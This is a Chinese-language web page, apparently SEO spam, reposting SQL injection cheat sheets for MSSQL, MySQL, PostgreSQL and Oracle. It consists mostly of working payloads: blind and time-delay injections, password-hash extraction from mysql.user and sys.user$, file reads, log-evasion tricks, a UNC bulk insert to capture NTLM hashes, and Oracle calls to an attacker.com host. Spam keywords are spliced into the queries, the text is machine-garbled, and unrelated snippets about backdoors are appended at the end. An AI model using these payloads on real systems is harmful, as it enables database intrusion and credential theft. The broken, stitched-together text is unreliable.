如何进入黑客模式-算命 推荐-SQL注入速查表（下）与Oracle注入速查表

看命 强烈推荐-SQL注入速查表（下）与Oracle注入速查表

一、SQL注入速查表（下）

0x00 文件目录

盲注

有关盲注

实战演练中的盲注案例

廷时盲注

WAITFOR DELAY[time](S)

案例

BENCHMARK()(M)

案例

如何进入黑客方式 pg_sleep(seconds)(P)

遮盖印痕

-sp_password log bypass(S)

注入检测

一些别的的MySQL手记

MySQL中功能强大的涵数

SQL注入的高級应用

强制性SQL Server来获得NTLMhach

Bulk insert UNC共享文档 (S)

0x01 盲注

如何进入黑客方式

有关盲注

一个历经详细而出色开发设计的运用一般来说你是看不见报错的，因此 你是没法从Union进攻和不正确中获取出数据信息的

一般盲注，你不能在网页页面中见到回应，可是你仍然能同一个HTTP状态码获知查看的結果

彻底盲注，你不管怎么输入都彻底看不见一切转变。你只有根据系统日志或是其他哪些的来注入。尽管不太普遍。

在一般盲注下你可以应用If句子或是**WHERE查看注入\\***|(一般来说非常简单)*，在彻底盲注下你需要应用一些延时函数并剖析响应速度。因此在SQL Server中你需要应用WAIT FOR 如何进入黑客方式 DELAY '0:0:10'，在MySQL中应用BENCHMARK()，在PostgreSQL中应用pg_sleep(10)，及其在ORACLE中的一些PL/SQL小窍门。

实战演练中的盲注案例

下列的輸出来源于一个真正的个人盲注专用工具在检测一个SQL Server后端开发运用而且解析xml表名这种要求完成了之一个表的之一个标识符。因为是自动化技术进攻，SQL查看比具体要求略微繁杂一点。在其中大家应用了二分搜索来检测标识符的ASCII码。

TRUE和FALSE标示意味着了查看回到了true或false

TRUE : 如何进入黑客方式 SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM[User]WHERE ID 如何进入黑客方式 = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1如何进入黑客方式 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)

FALSE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT 如何进入黑客方式 IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE 如何进入黑客方式 xtYpe=0x55)),1,1)),0)

FALSE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, 如何进入黑客方式 Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)

FALSE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND 如何进入黑客方式 ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM[User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects 如何进入黑客方式 WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)

因为上边后2个查看全是false，大家能清晰的了解表名的之一个标识符的ASCII码是80，也就是"P"。这就是我们根据二分优化算法来开展盲注的方式。别的已经知道的方式是一位一位(bit by bit)地获取数据。这种方式在不一样标准下都很合理。

廷时盲注

更先，只在彻底沒有提醒(really 如何进入黑客方式 blind)的状况下应用，否则请应用1/0 *** 根据不正确来分辨差别。次之，在应用20秒之上的廷时时要当心，由于运用与数据库查询的联接API很有可能会判断为请求超时(timeout)。

WAITFOR DELAY time

这就跟sleep类似，等候特殊的時间。根据CPU来让数据库查询开展等候。

WAITFOR DELAY '0:0:10'--

你也能够那样用

WAITFOR DELAY '0:0:0.51'

案例

俺是sa吗？ if (select user) 如何进入黑客方式 = 'sa' waitfor delay '0:0:10'

ProductID =1;waitfor delay '0:0:10'--

ProductID =1);waitfor delay '0:0:10'--

ProductID =1';waitfor delay '0:0:10'--

ProductID =1');waitfor delay '0:0:10'--

ProductID =1));waitfor delay '0:0:10'如何进入黑客方式--

ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK()(M)

一般来说也不太喜爱用这一来做MySQL廷时。小心点用由于这会很快地耗费服务器空间。

BENCHMARK(howmanytimes, do this)

案例

俺是root吗？爽！ IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100000000如何进入黑客方式0,MD5(1))

分辨表是不是存有 IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds)(P)

睡眠质量特定分秒。

SELECT pg_sleep(10);睡个十秒

遮盖印痕

-sp_password log bypass(S)

出自于安全性缘故，SQL Server不容易把带有这一选择项的查看系统日志纪录进系统日志中(!)。因此 假如你一直在查看中加上了这一选择项，你的如何进入黑客方式查看就不容易出現在数据库查询系统日志中，自然， *** 服务器系统日志依然会有的，因此 假如如果可以的话你能试着应用POST方式。

0x02 注入检测

这种检测既简易又清楚，适用盲注和悄悄的搞。

product.asp?id=4 ( *** O)

product.asp?id=5-1

product.asp?id=4 OR 1=1

product.asp?name=Book

product.asp?name=如何进入黑客方式Bo’+’ok

product.asp?name=Bo’ || ’ok (O M)

product.asp?name=Book’ OR ‘x’=’x

0x03 一些其他的MySQL笔记

子查询只能在MySQL4.1+使用

用户

SELECT User,Password FROM 如何进入黑客模式 mysql.user;

SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;

SELECT ... INTO DUMPFILE

把查询写入一个新文件中(不能修改已有文件)

UDF功能

create 如何进入黑客模式 function LockWorkStation returns integer soname 'user32';

select LockWorkStation();

create function ExitProcess returns integer soname 'kernel32';

select exitprocess();

SELECT USER();

SELECT password,USER() 如何进入黑客模式 FROM mysql.user;

admin密码哈希的之一位

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

文件读取

query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

如何进入黑客模式

MySQL读取文件内容

默认这个功能是没开启的！

create table foo( line blob );

load data infile 'c:/boot.ini' into table foo;

select * from foo;

MySQL里的各种延时

select benchmark( 500000, sha1( 'test' ) ); 如何进入黑客模式 query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );

遍历数据，暴力猜解

select if( (ascii(substring(user(),1,1)) >> 如何进入黑客模式 7) & 1,benchmark(100000,sha1('test')), 'false' );

MySQL中好用的函数

MD5()

MD5哈希

SHA1()

SHA1哈希

PASSWORD()

ENCODE()

COMPRESS()

压缩数据，在盲注时读取大量数据很好用

ROW_COUNT()

SCHEMA()

VERSION()

跟@@version是一样的

SQL注入的高级使用

一般来说你在某个地方进行SQL注入并期望它没有过滤非法操作，而这则是一般人注意不到的层面（hidden layer problem）

Name:' + (SELECT TOP 1 password FROM users ) + '

Email : xx@xx.com

[email protected]&#如何进入黑客模式65533;�骤，之后它就会把之一个用户的密码写进你的name里面。

强制SQL Server来得到NTLM哈希

这个攻击能够帮助你得到目标SQL服务器的Windows密码，不过你的连接很可能会被防火墙拦截。这能作为一个很有用的入侵测试。我们强制SQL服务器连接我们的WindowsUNC共享并通过抓包软件(Cain & Abel)捕捉NTLM session。

Bulk insert UNC共享文件 (S)

bulk insert foo from 如何进入黑客模式 '\\YOURIPADDRESS\C$\x.txt'

二、Oracle注入速查表

本文由Yinzo翻译，转载请保留署名。原文地址：http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

注：下面的一部分查询只能由admin执行，我会在查询的末尾以"-priv"标注。

探测版本：

SELECT banner FROM v$version WHERE banner LIKE &如何进入黑客模式lsquo;Oracle%’;

SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;

SELECT version FROM v$instance;

注释：

SELECT 1 FROM dual — comment

注: Oracle的SELECT语句必须包含FROM从句，所以当我们并不是真的准备查询一个表的时候，我们必须使用一个假的表名‘dual’

当前用户：

SELECT 如何进入黑客模式 user FROM dual

列出所有用户：

SELECT username FROM all_users ORDER BY username;

SELECT name FROM sys.user$; — priv

列出密码哈希：

SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. 如何进入黑客模式 astatus能够在acct被锁定的状态下给你反馈

SELECT name,spare4 FROM sys.user$ — priv, 11g

密码破解：

checkpwd能够把Oracle8,9,10的基于DES的哈希破解掉

列出权限：

SELECT * FROM session_privs; —当前用户的权限

SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, 如何进入黑客模式 列出指定用户的权限

SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, 找到拥有某个权限的用户

SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

列出DBA账户：

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION 如何进入黑客模式 = ‘YES’; — priv, 列出DBA和对应权限

当前数据库：

SELECT global_name FROM global_name;

SELECT name FROM v$database;

SELECT instance_name FROM v$instance;

SELECT SYS.DATABASE_NAME FROM DUAL;

列出数据库：

SELECT DISTINCT owner FROM 如何进入黑客模式 all_tables; — 列出数据库 (一个用户一个)

– 通过查询TNS监听程序能够查询到其他数据库.详情看tnscmd。

列出字段名：

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and 如何进入黑客模式 owner = ‘foo’;

列出表名：

SELECT table_name FROM all_tables;

SELECT owner, table_name FROM all_tables;

通过字段名找到对应表：

SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;

— 注: 表名都是大写

查询第N行：

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)

查询第N个字符：

SELECT substr(‘abcd’, 3, 1) FROM dual; — 得到第三个字符‘c’

按位与(Bitwise AND)：

SELECT 如何进入黑客模式 bitand(6,2) FROM dual; — 返回2

SELECT bitand(6,1) FROM dual; — 返回0

ASCII值转字符：

SELECT chr(65) FROM dual; — 返回A

字符转ASCII码：

SELECT ascii(‘A’) FROM dual; — 返回65

类型转换：

SELECT CAST(1 AS char) 如何进入黑客模式 FROM dual;

SELECT CAST(’1′ AS int) FROM dual;

拼接字符：

SELECT ‘A’ || ‘B’ FROM dual; — 返回AB

IF语句：

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;

— 如何进入黑客模式 跟SELECT语句在一起时不太管用

Case语句：

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — 返回1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — 返回2

绕过引号：

SELECT chr(65) || chr(66) FROM dual; — 返回AB

延时：

BEGIN DBMS_LOCK.SLEEP(5); 如何进入黑客模式 END; — priv, 在SELECT中用不了

SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 如果反查很慢

SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — 如果正查很慢

SELECT UTL_HTTP.REQUEST(‘http://google.如何进入黑客模式com’) FROM dual; — 如果发送TCP包被拦截或者很慢

— 更多关于延时的内容请看Heavy Queries

发送DNS请求：

SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;

SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

命令执行：

如果目标机装了JAVA就能执行命令，看这里

有时候ExtProc也可以，不过我一般都成功不了，看这里

本地文件读取：

UTL_FILE有时候能用。如果下面的语句没有返回null就行。

SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;

JAVA能用来读取和写入文件，除了Oracle Express

主机名称、IP地址：

SELECT 如何进入黑客模式 UTL_INADDR.get_host_name FROM dual;

SELECT host_name FROM v$instance;

SELECT UTL_INADDR.get_host_address FROM dual; — 查IP

SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 查主机名称

定位DB文件：

SELECT name FROM V$DATAFILE;

如何进入黑客模式

默认系统和数据库：

SYSTEM

SYSAUX

额外小贴士：

一个字符串列出所有表名：

select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables

– 当你union联查注入的时候只有一行如何进入黑客模式能用与返回数据时使用

盲注排序：

order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end

— 你必须知道两个拥有相同数据类型的字段名才能用

译者注： 如何进入黑客模式 Oracle注入速查表的作者这边还有MSSQL、MySQL、PostgreSQL、Ingres、DB2、Informix等数据库的速查表，不过我看Drops里面MSSQL和MySQL都已经有比较好的文章了，所以如果有需求的话请在评论留言。

黑客马拉松有种“来一个就会来一群”的气氛,已经成为沟通、学习和测试新插件及吸引风投机构的新型论坛。“黑客马拉松”规模各异,可能是在酒店自助餐厅举行、只有20。算命 推荐

黑客盗钱有交易记录吗非法侵入互联网系统的计算机操作者黑客是电脑专家,也叫软件高级工程师,是一些专门研究 *** 的,一般都是利用实用技术进行 *** 唯护,修补漏洞等等,他们对计算机有这狂热的如何进入黑客模式兴趣和执着的追求,和。

算命 推荐入门的太坑,你看了也入不了门,随便一个书籍就行了,只要你能看的懂!《白帽子讲web安全》黑客的基本技能黑客态度重要,但技术更加重要。态度无法替代技术,在你被别的黑客称为黑客之前,有一些基本的技术你必须掌握。这些基本技术随着新技术的。

。首先黑客是违法的,窃取别人的数据信息等等。 实际上是信息安全。 现在大学里面计算机系、院有信息安全的专业。 书店里面也有这方面的书。 至于。

一、远程开启系统后门开启系统后门后,就可以使用后门程序对目标电脑进行控制和监听。黑客通过在电脑中植入后门程序如何进入黑客模式服务端对电脑进行入侵,而不被用户发现。算命 推荐

可以到培训机构做老师,如果你毕业学校不错的话,会很吃香的。

算命 推荐不知道你有没掌握什么电脑专业知识先多学学黑客的一般术语本人也想学黑客技术的经常看看黑客们 *** 的动画在这里给你复制他人的劳动成果希望对你有。

标签：